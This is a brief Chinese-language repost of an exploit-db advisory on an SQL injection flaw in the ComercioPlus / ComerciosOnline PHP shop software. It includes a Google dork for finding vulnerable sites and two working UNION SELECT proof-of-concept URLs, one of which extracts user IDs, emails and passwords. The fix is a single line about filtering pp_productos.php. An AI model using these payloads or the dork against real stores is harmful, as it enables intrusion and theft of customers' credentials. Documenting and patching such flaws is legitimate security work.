ComercioPlus 5.6 SQL注入漏洞及修复 -电脑资料

电脑资料时间：2019-01-01 我要投稿

【www.unjs.com - 电脑资料】

ComercioPlus是一款使用PHP编写的虚拟商店系统，ComercioPlus 5.6版中的pp_productos.php文件存在 SQL注入漏洞，可能导致敏感信息泄露，

ComercioPlus 5.6 SQL注入漏洞及修复

。

[+]info:

~~~~~~~~~

# Exploit Title: Comerciosonline CMS SQLi

# Google Dork: allintext: " Servicio ofrecido por ComerciosOnLine "

# Date: 27/01/2011

# Author: Daniel Godoy

# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com

# Author Web: www.delincuentedigital.com.ar

# Software Link: http://www.comerciosonline.com/index.php?p=8

# Version: All

# Tested on: Linux, Windows

[+]poc:

~~~~~~~~~

http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--

http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--

[+]Reference:

~~~~~~~~~

http://www.exploit-db.com/exploits/16060

修复：pp_productos.php进行过滤

相关文章